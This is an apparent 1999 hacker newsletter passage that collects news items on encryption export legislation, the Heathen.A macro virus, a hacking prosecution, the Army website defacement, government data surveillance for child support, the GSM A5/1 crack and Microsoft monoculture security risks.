Bills to loosen the restrictions on exporting strong encryption were approved on Thursday by the U.S. Senate and House Commerce Committees. The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery. Yeah!

CNN

U.S. committees approve encryption bill
by Elinor Mills Abreu
From...

(IDG) -- The U.S. Senate and House Commerce Committees Thursday approved bills that would liberalize encryption export regulations. In addition, the Senate committee passed bills calling for the promotion of digital signatures and filtering software to block pornography.

The House Security and Freedom through Encryption (SAFE) Act removes the government restrictions on export of strong encryption if a comparable encryption product is commercially available outside the U.S. In addition, the SAFE Act bars the government from requiring key recovery, whereby the government would have access to keys to decode encrypted messages for law-enforcement purposes.

The government argues that it needs to control the export of strong encryption for national security. Vendors argue that the restrictions hamper their competitiveness on the worldwide market because strong encryption is readily available outside the U.S. The government wants vendors to develop encryption software that includes a key recovery mechanism.

The amendments approved by the House committee would do several things: require that a comparable encryption product be available in a country outside the U.S. in order for a U.S.
company to export similar technology there; bar export to the People's Liberation Army or the Communist Military in China; allow the Secretary of Commerce to deny the export of encryption products if they would be used to harm national security, to sexually exploit children or to execute other illegal activities; require the Secretary of Commerce to consult with the secretaries of State and Defense, the Director of Central Intelligence and the Attorney General when reviewing a product; and subject a person to criminal penalties for not providing access to encrypted data if a subpoena were served and the person had the capability to decrypt the data.

Meanwhile, Sen. John McCain [R-Ariz.] proposed a Senate encryption bill that would allow for the exportation of encryption of key lengths up to 64 bits. In general, companies currently must get a license to export encryption higher than 56 bits in key length. In addition, the McCain encryption bill would allow for the export of stronger "nondefense" encryption to "responsible entities" and governments in the North Atlantic Treaty Organization, the Association of Southeast Asian Nations and the Organization for Economic Cooperation and Development. However, the Secretary of Commerce would be allowed to prohibit export of particular encryption products to an individual or organization in a foreign country.

An Encryption Export Advisory Board would be created to review applications for exemption of encryption of over 64 bits, make recommendations to the Secretary of Commerce and authorize more funding to law enforcement and national security agencies to "upgrade facilities and intelligence." The bill would ask the National Institute of Standards and Technology to establish an advanced encryption standard by Jan. 1, 2002.

"The bill carefully balances our national security and law enforcement interests while updating current laws on encryption technology," McCain said in a statement. "It is illogical to deny U.S.
producers the ability to compete globally if similar products are already being offered by foreign companies."

On the digital signature front, Sen. Spencer Abraham [R-Mich.] said the Millennium Digital Commerce Act he sponsored would "ensure that individuals and organizations in different states are held to their agreements and obligations even if their respective states have different rules concerning electronically signed documents." The Abraham bill would pre-empt state law from denying that digital contracts are legal solely because they are in electronic form; establish guidelines for international use of electronic signatures that would remove obstacles to electronic transactions; and allow the market to determine the type of authentication technology used in international commerce.

The Senate Commerce Committee also grappled with Internet censorship by approving another McCain-sponsored bill. The plan would require schools and libraries receiving government universal service discounts for Internet access to use filtering technology on computers children access that would screen out pornography.

Taking up a less controversial bill, the Senate committee also approved a measure to tie cellular phone users calling 911 to medical centers, police and firefighters for faster response time to accidents and emergencies. The bill would expand the coverage areas of wireless telephone service; establish parity of protection for the provision or use of wireless 911 service; and upgrade 911 systems so they can provide information such as location and automatic crash notification data.

Alan Davidson, staff counsel for the Washington, D.C.-based Center for Democracy and Technology, said "it was a mixed day for the Internet on Capitol Hill."
While legislators realize the potential of electronic commerce and favor liberalizing encryption export to advance it, they are fearful of what they see as the "dark side" of the Internet - content that might be objectionable, according to Davidson. Rather than require filtering software in schools and libraries, legislators should offer educational institutions the flexibility to choose "acceptable use or monitoring policies," he said.

"Mandating that every school and library filter access to the Internet is not going to be the best way to protect kids," he said. "In addition to the fact that the bill has constitutional problems, it mandates one technological approach without regard to the more effective ways that local communities are already protecting kids."

Other committees may review these bills before they go to the floor of the two houses for a vote, he said.

@HWA

13.0 Heathen.A Spreads Through Word Files
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN contributed by nvirb

While not intentionally malicious, nor as fast-spreading as Melissa or Worm.ExploreZip, Heathen.A is the latest threat to computer users. Heathen.A is considered to be a multipartite virus and infects only Word 97 files.

PC World
/article/0,1510,11586,00.html

Heathen.A Is at the Gates
Keep a lookout: There's a new bug in town.
by Matthew Nelson, InfoWorld Electric
June 25, 1999, 4:50 p.m. PT

SAN MATEO, CALIFORNIA -- Network Associates' Anti-Virus Emergency Response Team is warning users about what it terms a "medium risk" virus called Heathen.A. Heathen.A is a multipartite virus, as it uses two classes of files, an .exe portion and a .doc portion, for its infection. The virus was originally spread from a newsgroup and replicates itself across Microsoft Word 97 files, but it does not destroy data.
"It's delivered if someone receives an e-mail with an infected Word 97 document, or if they access any server file that is infected," says Allison Taylor, product marketing manager for corporate antivirus solutions at Network Associates. "It doesn't carry a particular payload except for dropping a patch into your [Windows] 95/98 shell." "It runs a modified version of your Windows Explorer system and then infects the Word 97 documents," Taylor explains. "So once you've been infected, any Word 97 file that you open from then on will also be infected." The macro drops three system files, heathen.vex, heathen.vdl, and heathen.vdo, into a system's C:/Windows subdirectory. When the system is rebooted, the heathen.vex file is renamed explorer.exe, according to AVERT Labs. NAI has assigned the Heathen.A virus a medium-risk level as it is not engineered to appear to be coming from a known user, and because it infects new systems only if a user opens an infected Word 97 file. Heathen.A does not send itself through e-mail as Melissa and Worm.ExploreZip do. NAI has issued a virus update to protect against the Heathen.A virus at AVERT Labs' Web site. @HWA 14.0 $950 for a Log File Analysis Tool ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 28th From HNN contributed by Weld Pond Sandstorm Enterprises has introduced what they are calling a TCP/IP Session Reassembler named TCP.demux. According to the press release it doesn't seem to be more than a glorified grep script. Maybe it is actually useful but $950 seems a little steep. Excite News Sandstorm Enterprises Sandstorm Enterprises Introduces TCP.demux, a TCP/IP Session Reassembler; New, Efficient Tool for Network-Based Investigations, Auditing, and Reverse Engineering Click on our sponsors! Updated 1:34 PM ET June 23, 1999 BOSTON (BUSINESS WIRE) - Sandstorm Enterprises Inc., an information security tools company, has released the first version of TCP.demux, a TCP/IP session reconstruction utility. 
TCP.demux is the first of a set of tools from Sandstorm Enterprises for advanced network monitoring and surveillance. TCP.demux is designed to make network monitors, such as "tcpdump", "snoop", and "Sniffer Basic" more useful. There are so many connections over even a medium-sized network that it is often impossible for even a high-end commercial network analyzer to present the traffic in a clear, informative way. TCP.demux takes IP streams captured by network monitors, reassembles them into their constituent TCP/IP and UDP sessions, and displays the information in a variety of convenient formats. TCP.demux includes sophisticated and powerful analysis tools for quick identification of relevant sessions.

Possible uses of TCP.demux include network security, reverse engineering, and network-based software development. It can be used to create profiles of suspicious users and to find information being sent unencrypted over a network. It can also help point out weaknesses and vulnerabilities in network applications and design. TCP.demux detects and flags anomalies that may be designed to interfere with network monitoring.

TCP.demux generates reports in 19 different text or HTML formats. It runs on a wide variety of platforms, including Windows 95/98/2000/NT and many varieties of UNIX, including RedHat Linux 5.1, NetBSD, OpenBSD, FreeBSD, BSDI, and Solaris. TCP.demux can easily be included in batch files, shell scripts, and other applications in any computer language.

The idea of a TCP session reconstruction tool is not new, but all other such tools have been platform-specific and embedded in ponderous application suites. "There have been many tools for winnowing through Internet traffic flows, but almost everything to date has been scaled or developed for the workgroup environment," says James VanBokkelen, Sandstorm's President and founder. "The Internet has grown enormously in the past few years, and with it the scale of the problems.
TCP.demux is the first tool we know of designed with the scope of today's problems in mind."

Analyzing network traffic with TCP.demux is time-efficient, and therefore cost-efficient. Because dumpfile analysis is separated from the capture process, TCP.demux allows remote monitoring of networks. An engineer at one of Sandstorm's beta sites said, after TCP.demux had allowed him to isolate problems on a large congested network in under half an hour, "TCP.demux was the quickest way to debug the system. Had the debugging process been long, it would have jeopardized our ability to ship on time."

TCP.demux is being offered at the introductory price of $950. Additional information on TCP.demux can be found at

Sandstorm Enterprises, headquartered in Boston, MA, has been acclaimed for its groundbreaking PhoneSweep telephone scanner, the first commercial product designed to audit corporate telephone networks for vulnerability to attacks by hackers. See Sandstorm Enterprises at the USENIX Security Conference in Washington, D.C. August 25-26. Sandstorm personnel collectively have decades of experience in security management, software development, research, education, and consulting. Sandstorm is committed to providing trusted, reliable products and excellent technical support.

Sandstorm Enterprises is on the web at

PhoneSweep and TCP.demux are trademarks of Sandstorm Enterprises, Inc.

Contact: Sandstorm Enterprises, Inc.
James Van Bokkelen
(617) 426-5056 or
In Washington, DC: Ross Stapleton-Gray or

@HWA

15.0 Youth Charged With $20,000 in Damages
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 28th
From HNN contributed by Richard223

The case of a minor from Chesterfield County, Mass., made it into a newspaper in Virginia. The youth has been charged with breaking into ACIS/BICNet; according to court documents he caused "the entire system to crash," which resulted in over $20,000 in damage.
Evidently the Virginia High Technology Crimes Unit was the investigating office since the suspect used one Virginia system to route his traffic.

Richmond Times Dispatch

Chesterfield youth pleads guilty to hacking
Friday, June 25, 1999
BY MARK BOWES
Times-Dispatch Staff Writer

A Chesterfield County youth who authorities said is intelligent but committed a foolish act has pleaded guilty to hacking into a Massachusetts Internet provider's system, disabling it and causing at least $20,000 in damage.

The 16-year-old, whose identity is being withheld because of his age, pleaded guilty to computer trespassing Monday in Chesterfield Juvenile and Domestic Relations District Court. The judge continued the matter until Aug. 12 so he can decide whether to convict the boy of a felony, as charged, or reduce it to a misdemeanor.

Through his attorney, the boy agreed the evidence was sufficient to convict him, "but contested whether or not it was maliciously done," which is required for a felony conviction, said Assistant Chesterfield Commonwealth's Attorney Aubrey M. Davis Jr.

"I didn't see it as [a malicious] act," Davis said. "I think it was a foolish act by an intelligent kid who didn't really realize the significance of what he was doing. He's a pretty daggone smart kid."

Virginia State Police Special Agent Sal Girgente, who investigated the case here, gave a summary of evidence in court on Monday.

According to evidence, the boy, using his mother's Internet account, hacked into the computer network of ACIS/BICNet, an Internet service provider in Ayer, Mass., in August. State police also believe he succeeded in breaking into the computer systems of New Mexico State University and Aurora Communications Exchange Ltd., in Ontario, Canada. Investigators believe he may have hacked into the latter two systems to "cover his tracks" before breaking into the Internet provider's network.
The state police's new High Technology Crimes Unit began investigating the case after getting a referral from the FBI's Boston field office. An agent there succeeded in tracking an intruder into the ACIS/BICNet system back through a Virginia Internet provider to the boy's home in Chester.

During an intrusion on Aug. 8, police believe the teen and possibly accomplices replaced system files, among other things, created a new account and turned off system logging, according to court documents. That caused the company's e-mail system to be out of service for 12 hours. Several days later, the intruder again broke into the system and succeeded in causing "the entire system to crash," court papers say. The resulting damage, police said, topped $20,000.

The teen "succeeded in bringing the system to its knees," Girgente said. Three FBI traces were successful in leading authorities to the Chesterfield family's Internet account. Police believe the boy and other hackers broke into the system to play games or create chat rooms.

1999, Richmond Newspapers Inc.

@HWA

16.0 Army Fights Online Battle And Loses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN contributed by Space Rogue

Early Monday morning one of the four web servers for the US Army came under attack. The web page poked at the FBI and their recent raids of the members of the group gH. was quickly noticed as being defaced and was restored by 6am. It is believed that the attackers used a highly publicized exploit for Cold Fusion, an exploit for which a patch has been available for weeks. (Hmmmmm, maybe I should reenlist and help them out?)

HNN Cracked Pages Archive - Be sure to read the html comments.
CNN
San Jose Mercury News
APB Online
MSNBC
Nando Times,1634,65142-103297-733898-0,00.html
ZD Net,4586,2285307,00.html

CNN; Hackers attack Army's main Internet site
June 28, 1999
Web posted at: 7:37 PM EDT (2337 GMT)

WASHINGTON (AP) -- Computer hackers defaced the Army's main Web site in the latest digital attack on a federal system. Pentagon workers noticed it early Monday and repaired it.

Army spokesman Jim Stueve said administrators believe hackers altered the site between 8 p.m. Sunday and 5 a.m. Monday, but no internal systems were affected. "There were no security breaches," he said.

The altered site announced the attack "has a purpose ... to settle rumors" about the demise of the loosely organized hacker group that claimed responsibility for the May attack on the White House Web site. Another message hidden within the altered page's computer code urged people who saw it to "trust very few people."

Stueve said he noticed the defaced page when he arrived for work Monday morning. It was replaced by 6 a.m. "I just looked at it and just went on to my favorites (other sites) and blew it off because I knew they were going to get to it right away," he said.

The attack comes in the wake of several others on prominent government Internet sites, including those of the White House, FBI and Senate. Military pages have long been favorites of hackers. "They're always the target," said Keith Rhodes, a director in the information management division in the General Accounting Office, the investigative branch of Congress. "It's almost like a rite of passage. You have to bust a (military) site to have any credibility."

Just last week, experts told the House Science Committee's technology panel that managers at many federal agencies fail to consider computer security adequately and have too few employees with sufficient training. Rhodes, who was among those testifying last week, said Monday that the Defense Department's computer-security expertise is uneven.
"They're the best and the worst in computer security," Rhodes said. "They've got some real pros, some of the best in the business. But the DOD is huge ... and some of the areas in the Department of Defense don't have very good security." Outside security experts said they believed the Army site's attackers used a relatively well publicized security loophole in the popular Cold Fusion software package. The Army said only that the incident was under investigation. "The community of attackers is getting better at what they do, and a lot of their tools are getting automated," Rhodes said. "And a lot of the software being sent out is getting worse -- designed for flash with security as an afterthought. You put up your Web site, and its gets creamed." @HWA 17.0 Welfare Reform Law Invades Privacy of US Citizens ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 29th From HNN contributed by Weld Pond The Personal Responsibility and Work Opportunity Reconciliation Act of 1996 was primarily passed to reform the welfare system in the United States. One of the little known provisions of this law is that employers must report all new hires and salary changes to the government on a quarterly basis, this information eventually makes its way to the Administration for Children and Families. Starting next month the program will require banks to search for accounts on people determined to be delinquent on their child-support payments. (Ed Note: This is an eye opening article and is recommended. It is long and the good stuff is at the bottom.) The Charlotte Observer Posted at 7:45 p.m. EDT Saturday, June 26, 1999 Huge new electronic `dragnet' assailed by privacy advocates By ROBERT O'HARROW JR. 
The Washington Post

WASHINGTON -- As part of a new and aggressive effort to track down parents who owe child support, the federal government has created a vast computerized data-monitoring system that includes all individuals with new jobs and the names, addresses, Social Security numbers and wages of nearly every working adult in the United States.

Government agencies have long gathered personal information for specific reasons, such as collecting taxes. But never before have federal officials had the legal authority and technological ability to locate so many Americans found to be delinquent parents -- or such potential to keep tabs on Americans accused of nothing.

The system was established under a little-known part of the law overhauling welfare three years ago. It calls for all employers to quickly file reports on every person they hire and, quarterly, the wages of every worker. States regularly must report all people seeking unemployment benefits and all child-support cases.

Starting next month, the system will reach further. Large banks and other financial institutions will be obligated to search for data about delinquent parents by name on behalf of the government, providing authorities with details about bank accounts, money-market mutual funds and other holdings of those parents.

State officials, meanwhile, have sharply expanded the use of Social Security numbers. Congress ordered the officials to obtain the nine-digit numbers when issuing licenses -- such as drivers', doctors' and outdoorsmen's -- in order to revoke the licenses of delinquents.

Enforcement officials say the coupling of computer technology with details about individuals' employment and financial holdings will give them an unparalleled ability to identify and locate parents who owe child support and, when necessary, withhold money from their paychecks or freeze their financial assets.

``They never get away from us anymore. It's just wonderful. . . .
What you're trying to do in child support is build a box, four walls, around a person,'' said Brian Shea, the acting executive director of child-support enforcement in Maryland. ``It has in some ways revolutionized this business.''

But privacy experts and civil libertarians say the scope of the effort raises new questions about the proper line between aggressive public policy and intrusive government snooping. In pursuing an objective that is almost universally applauded, the government has also created something that many Americans have staunchly opposed: a vast pool of fresh personal information that could be used in a variety of ways to monitor their lives.

``What you have here is a compilation of information that is much better and more current than any other data system in the U.S.,'' said Robert Gellman, an attorney and privacy specialist in Washington, D.C. ``All of the sudden we're on the verge of creating the Holy Grail of data collection, a central file on every American.''

Already lawmakers, federal agencies and the White House have considered expanding the permitted aims of the system to include pinpointing debtors, such as students who default on government loans.

Under the system, every employer must send information about new hires and quarterly wages to state child-support agencies. State officials gather the data, along with information on unemployment benefits and child-support cases, and then ship it to computers run by the Administration for Children and Families. ACF officials then use computers to sort and send back to state authorities reports about people obligated to pay child support.

Government officials say the system is safe, accurate and discreet. They also say it is secure. Because it has, among other safeguards, systems that confirm the accuracy of Social Security numbers, officials say it will not intrude into the lives of most people.
An examination of the program, however, shows that government officials have downplayed or overlooked a variety of privacy and security concerns as they worked to meet congressional deadlines. The computer system that houses much of the data at the Social Security Administration ``has known weaknesses in the security of its information systems,'' according to a Dec. 31 report by the General Accounting Office. And authorities have not studied the frequency of mistakes that might arise from incorrect data, even though the system will enable local child-support enforcement officials to routinely freeze a parent's assets without an additional court hearing.

Few people know about the system, even though it was created through one of the signature acts of Congress and the Clinton administration -- the ``Personal Responsibility and Work Opportunity Reconciliation Act of 1996,'' the law that ended the federal guarantee of welfare payments. Much of the congressional debate and news coverage at the time focused on the broad policy and political implications of the new law.

Officials have not publicized their ability to obtain financial information because they do not want to alert delinquents to the ability of enforcement workers to seize or freeze financial assets, according to Michael Kharfen, spokesman for the federal Administration for Children and Families, which administers the program.

When welfare reformers on Capitol Hill and the White House approved the system in 1996, their aim was to cut down welfare spending by boosting child-support payments.

They had in mind people such as Stephanie Dudley and her son, Robert, who live in Farmington, Minn. Robert's father had split up with Dudley shortly after the boy was born and drifted from place to place. He owed $350 a month in child-support payments, but it was hard tracking him down and getting him to pay.
Officials found Robert's father -- and then started withholding money from his paycheck -- after a new employer in Pennsylvania reported him to the network. ``I literally was living from check to check,'' Dudley said. ``I mean, that money literally put shoes on the kids' feet, helped pay the rent.'' Kathy Robins of Tazewell, Va., and her 7-year-old son, Dwight, never received court-ordered child support until the system turned up his father in North Carolina. Now she gets about $120 a month, money she plans to use to pay for a babysitter this summer. ``It'll help,'' she said. ``I mean, it's better than I was getting before, which was nothing.'' Child-support advocates contend that fears about privacy are overblown when weighed against such successes. (End Optional Trim) As of 1997, the latest year for which figures available, more than 7.4 million delinquents owed more than $43 billion in past child support. The system has helped boost support payments from $12 billion in 1996 to $14.4 billion last year, officials said. And in 1997, the burgeoning system helped enforcement programs locate more than 1.2 million delinquents. The system is essentially an electronic dragnet. It collects the names, Social Security numbers and other data about every newly hired employee in the nation from employers, who also must provide pay reports for most wage-earning adults. States ship along the names and other identifying information of people who receive state unemployment insurance. The Administration for Children and Families, a part of the Department of Health and Human Services, serves as a sort of clearinghouse that automatically matches all of that information against a file of nearly 12 million child support cases to locate parents obligated to pay support. Then the agency provides information about those parents -- no matter whether they are behind on payments -- to the appropriate state enforcement workers. The idea is to track the parents across state lines. 
Supporters of the system note that Congress explicitly restricted access to it. Those authorized to use the information include the Social Security Administration, which can use the directory of new hires to verify unemployment reports; the Treasury Department, which can use it to cross-reference tax-deduction claims; and researchers, who gain access only to anonymous data.

Next month, financial institutions that operate in multiple states will begin comparing a list of more than 3 million known delinquents against their customer accounts. Under federal law, the institutions are obligated to return the names, Social Security numbers and account details of delinquents they turn up. The Administration for Children and Families will then forward that financial information to the appropriate states. For security reasons, Kharfen said, the agency will not mix the financial data with information about new hires, wages and the like. Bank account information will be deleted after 90 days.

In a test run this spring, Wells Fargo identified 72,000 customers whom states have identified as delinquents. NationsBank found 74,000 alleged delinquents in its test.

(Begin Optional Trim)

Civil liberties activists say it would be a mistake to consider the system solely in terms of finding bad parents and making them pay up. They worry that the network sets a new standard for data surveillance by using computers to cross-reference hundreds of millions of personal records about Americans.

Over the past quarter-century, since the Privacy Act was enacted in 1974, the federal government has tried to place limits on how its officials could compare databases to find or profile people. And in general, the government was supposed to limit data collection about people who paid taxes, received a federal benefit, served in the military or tangled with the judicial system.

Critics say this new effort leaps beyond those practices by systematically creating centralized files about workers, wages and families, and sifting through those files to find a relatively small number of suspected deadbeats. The new registry of child-support cases, for example, now requires the names of all parents and children involved, even if they do not receive public assistance or ask for help in getting a problem resolved. The registry has information about nearly 12 million families.

There is also concern about the government's reliance on private employers and financial institutions to watch citizens. A proposal last year to require banks to routinely track customer transactions for signs of criminal activity prompted an outpouring of protest. Regulators ditched the plan, called Know Your Customer, this spring after acknowledging they had misstepped.

Taylor Burke, vice president of Burke & Herbert Bank & Trust Co. in Alexandria, Va., said he doesn't believe banks should be asked to watch their customers so closely on behalf of the government. ``We're all good citizens. But it doesn't mean we spy on our neighbors,'' Burke said. ``It's really scary.''

A review of the swift development of the system has turned up still other questions about whether the government paid enough attention to privacy -- particularly at a time when the issue has become a flash point in public policy debates across the country.

As the system was phased in, officials posted federally required notices only in the Federal Register. No additional information has been added to W-4 forms that people must fill out when taking a new job.

In addition to the issues raised by the GAO about the security of computer systems gathering and transmitting personal information, the systems in about a dozen states also have not been certified by federal officials as meeting security and privacy guidelines.

Officials in OMB and the Administration for Children and Families sought to allay fears about mistakes. While acknowledging they have no idea about the likely rate of errors because no study was conducted, officials said the program verifies the accuracy of any Social Security numbers before sending data along to the states. In addition, officials said, individuals in every state will have an opportunity to appeal administrative actions. Virginia, for instance, will give parents up to 10 days before seizing assets, a state official said. Critics wonder what might happen to someone who is away on vacation or business.

``A Social Security number is not a bullet-proof identifier. There are always going to be mistakes,'' said Mary J. Culnan, a business professor at Georgetown University's McDonough School of Business, who drew an analogy to problems with the accuracy of credit reports in the early 1990s.

Finally, the operation appears to be at odds with the Clinton administration's recent push to make privacy a priority. Last month, Clinton called on banks and other financial institutions to give consumers more control over how their information is gathered and used. ``President Clinton believes that consumers deserve notice and choice about the use of their personal information,'' said a White House memo about the event.

(End Optional Trim)

The assurances of officials do little to assuage the fears of people who worry about the potential ills of having a government that closely monitors its citizens. Such anxieties have been underscored by mistakes child-support enforcement workers have made in recent years. Last year, officials in Virginia had to apologize to 2,300 parents for misidentifying them as delinquent and announcing they would lose their hunting and fishing licenses. Officials attributed the mistake to a computer programming error. ``We're not perfect,'' a state official said at the time.
California officials also misidentified hundreds of men after the state began the federally mandated, data-driven crackdown on deadbeats. In some cases, they confused men who had similar names.

``In my estimation, this is going to be nothing more than a huge invasion of privacy,'' said James Dean of Oshkosh, Wis., who was unable to get a fishing license because he refused to provide his Social Security number.

AP-NY-06-26-99 1916EDT

@HWA

18.0 GSM Mobile Security is Cracked
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN contributed by Weld Pond

The A5/1 over-the-air voice privacy algorithm used by almost all GSM digital phones is no longer secure. A5/1 is the algorithm used by GSM phones to encrypt communications. It is theorized that software to decrypt captured conversations will be available within a year. The COMP128 algorithm, used to authenticate GSM phones for network access, was cracked last year.

The Australian

GSM mobile security is cracked
By DAN TEBBUTT
22jun99

DIGITAL mobile phone users could soon face the threat of eavesdropping, following a breakthrough reverse engineering effort in the United States.

Three California researchers say they have cloned the secret encryption method used to secure Global System for Mobile (GSM) communications.

Research leader Marc Briceno predicted unscrambling software could appear before the end of the year, following academic papers studying possible faults in the A5/1 over-the-air voice privacy algorithm. This standard is used in nearly all digital mobile phones in Australia.

Inherent flaws in the security technology suggested special cracking hardware devices could unscramble GSM conversations within seconds, according to Mr Briceno, director of the US-based Smartcard Developers Association. A network of personal computers could unlock the encryption method within a matter of hours.

"Mobile users should be worried about this," he said.

"Calls can be intercepted by a moderately motivated adversary who by no means needs to be a cryptography expert.

"The telecommunications providers' promise that GSM is secure with respect to random listeners can certainly no longer be maintained."

The reverse engineering project would allow greater public scrutiny over closely guarded GSM security technologies, he said. The reference implementation would allow academic cryptographers to probe for deficiencies in A5/1.

"Once the holes are found, any competent programmer can write an implementation to exploit those shortcomings."

Vodafone technical director Jonathan Withers warned against over-stating theoretical problems. "Practical attacks are pretty hard," he said.

But Mr Withers confirmed that GSM security standards were watered down after concerns were raised by law enforcement agencies. "A5/1 is set at a level that is deemed appropriate and acceptable by law enforcement," he said.

Telstra and Optus representatives declined to comment.

Australian Communications Authority standards and compliance manager Grant Symons defended digital security as adequate for the job. "The GSM algorithm has proven its worth for people engaged in everyday business and social activities. We're not talking about the military here," he said.

Mr Briceno said the synthesised algorithm was so functionally similar to the real A5/1 code that it could complete published GSM encryption benchmarks.

Last year he was part of a University of California, Berkeley, team that broke the COMP128 algorithm used to authenticate GSM phones for network access, prompting fears of billing fraud on digital mobile phones.

"In a business environment, where people believe their call is secure, the cost of eavesdropping could be a lot more than a few dollars on a phone bill," Mr Briceno said.
@HWA

19.0 Microsoft Mono-culture Poses National Security Risk
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

June 29th
From HNN contributed by Adam

This article asks the right question, "Is Microsoft a threat to national security?", but misses a few key points. The threat is worse than this article says. Remember that Melissa made it on board a Navy ship and jumped the supposed air-gap onto SIPRNet, two things that could not have happened if the military was not dependent on one company's products. The article talks about a CyberUL type of organization; this idea has been around for a while and was first proposed by Tan. Oh, and the part about a Mac being unhackable, don't believe it.

Forbes
CyberUL Proposal- By Tan
HNN Archive for March 31, 1999- Melissa on board 7th Fleet
HNN Archive for April 5, 1999- Melissa Jumps AirGap onto SIPRNet

Forbes; Is Microsoft a threat to national security?

IN SEPTEMBER 1997, the USS Yorktown, the Navy's first "smart ship," was conducting routine maneuvers off Cape Charles, Va. Things were fine until the onboard computer system, powered by Microsoft NT software, crashed, leaving the ship dead in the water for 2 hours and 45 minutes. Communications were knocked out. Weapons systems were down. The propulsion system wouldn't restart. If you think rebooting your laptop after it freezes is a drag, how would you like to try and reboot an entire battle cruiser?

Was it sabotage or an electromagnetic pulse? Nothing so dramatic: The computer was simply asked to divide by zero. Officials were quick to exonerate Microsoft for the glitch, claiming it was human error, and the Navy continues to install Windows NT servers on all its cruisers and destroyers, some 84 ships in all. Perhaps Navy brass haven't heard the joke making the rounds in military computer circles: What does NT stand for? Needs towing.

The question is, What would have happened if this had occurred in battle?

Of course, the Navy should modernize its fleet, incorporating the best computer technology this nation's geeks can create within the fabric of its ships. Should the Navy rely on Microsoft products, which have proved to be unstable, unreliable, hard to troubleshoot and riddled with security holes? It is ironic that as one part of the U.S. government goes after Microsoft in court, accusing it of monopolistic practices, Microsoft is quietly gaining a monopoly over another part.

Hackers--and now virus makers--have long delighted in taunting the "Satan from Redmond," churning out software programs that exploit holes in Microsoft products. Some of them have deliciously crude names, too, like Back Orifice, a software program originally created by a group called The Cult of the Dead Cow. Because Back Orifice enables a user to control and monitor a Windows operating system over a network without being detected, it is on just about every good hacker's laptop. It is easy to find--type it into almost any search engine and you'll encounter lists of sites that offer it as a free download.

What is particularly distressing is the emergence of the Microsoft mono-technology culture, in which its many products are tightly bundled together--Windows OS plus Microsoft Excel plus Microsoft Word plus Microsoft Outlook E-mail could very well equal big trouble. As Microsoft's dominance grows, Microsoft users become even more vulnerable.

Case in point: In March, the Melissa virus swept America, spreading when a user opened an attached Microsoft Word file. Upon activation, it looked for Outlook--Microsoft's E-mail, newsreader and personal information manager--created a message, and sent it to the first 50 people listed in the user's address book. Thankfully, the virus did not destroy or alter data, or trash hard drives, but it did flood networks with E-mail. This was not true of "Explore.exe," an Internet worm named for the file that launches it. In June, Explore.exe erased billions of gigs of information around the world.

Melissa and Explore.exe received wide coverage in the media, but you may not have heard of the most recent Microsoft security hole in Microsoft's Internet Information Server, which, according to eEye Digital Security Team, left approximately 90% of 1.3 million Microsoft web servers vulnerable to hack attacks. It seems that as soon as Microsoft develops a patch to combat a new exploit, someone comes up with a new one. By the time you read this column, I wouldn't doubt that more holes will be identified and plugged.

"No one knows what evil lurks in these 40 million lines of Windows NT code," says Rick Forno, author of The Art of Information Warfare. "You have to roll the dice and take your chances." His solution: Buy a Mac. They are virtually unhackable, he says. And he's not kidding.

But Forno, who truly believes that Microsoft is a threat to our nation's security, has other ideas, too. He proposes a kind of software version of the Underwriters Laboratory, a not-for-profit product safety testing group for electronics that has been around since 1894. It is responsible for the "UL-approved" stickers you see on lamps, Christmas tree lights and clock radios.

As for me, I'd like to change the model by which software companies peddle their products. Instead of allowing them to license software, which lets them dodge responsibility for poor quality, software vendors should be held liable for glitches that lead to security snafus and crashes. If you bought a car with locks on the door that didn't work properly, odds are the manufacturer would be held liable. So should software makers.

In addition, the government, and corporations, could lessen the impact of the next round of Melissa viruses or Explore.exe worms by relying on more than one operating system. The less we depend on one type of operating system, the less vulnerable we are.

Of course, this runs smack into Bill Gates' monopolistic vision: to place Windows on every computer, PDA, Navy ship and toaster. But Gates is only the richest man in the world, not the only software vendor in town. And that's how he should be treated.

Do you think heavy reliance on Microsoft products threatens our national security? Let me know in my forum.

Related links:
The Art of Information Warfare
Underwriters Laboratory

CyberUL Proposal- By Tan (Reprint)

Cyberspace Underwriters Laboratories [2]
Cyberspace Underwriters Laboratories - 01/11/1999

Underwriters Laboratory

Underwriters Laboratories was founded in 1894 by an electrical inspector from Boston, William Henry Merrill. In 1893, Chicago authorities grew concerned over the public safety due to the proliferation of untamed DC circuits and the new, even more dangerous technology of AC circuits. These new and little-understood technologies threatened our society with frequent fires, which caused critics to question if the technology could ever be harnessed safely. Merrill was called in and set up a one-room laboratory with $350.00 in electrical test equipment and published his first report on March 24, 1894.

Back in Boston, insurance underwriters rejected Merrill's plans for a non-biased testing facility for certification of electrical devices. Chicago, however, embraced the idea. Merrill took advantage of the situation in Chicago to get up and running and within months had support at the national level. Today, UL has tested over 12,500 products world-wide and is an internationally recognized authority on safety and technology. The UL mark of approval has come to provide an earned level of trust between customers and manufacturers and safely allowed our society to leverage hundreds of inventions that would have otherwise been unfit for public use.
While originally targeting inventions which could potentially cause physical harm to the user, the UL has expanded into the listing of alarm system products as well as alarm system installers. Individual products are listed as meeting UL standards and the companies that install those products are also listed as qualified to install the product as intended. Insurance companies have leveraged the UL's scrutiny to properly ascertain their risks.

Cyberspace

Today, technology continues to grow at a rapid pace, perhaps even out of control. The commercialization of the Internet has led many businesses to offer services out there in what has been called the Wild Wild West (WWW). As a result, the public safety is at risk. Utilities are bridging control systems to Internet attached back-office systems. Banks are offering 'cyber-banking' and merchants are collecting information about consumers as they transact their business over the Web. Individual privacy and the fiduciary trust banks and merchants have established over hundreds of years are open to new threats as these activities become more and more prevalent.

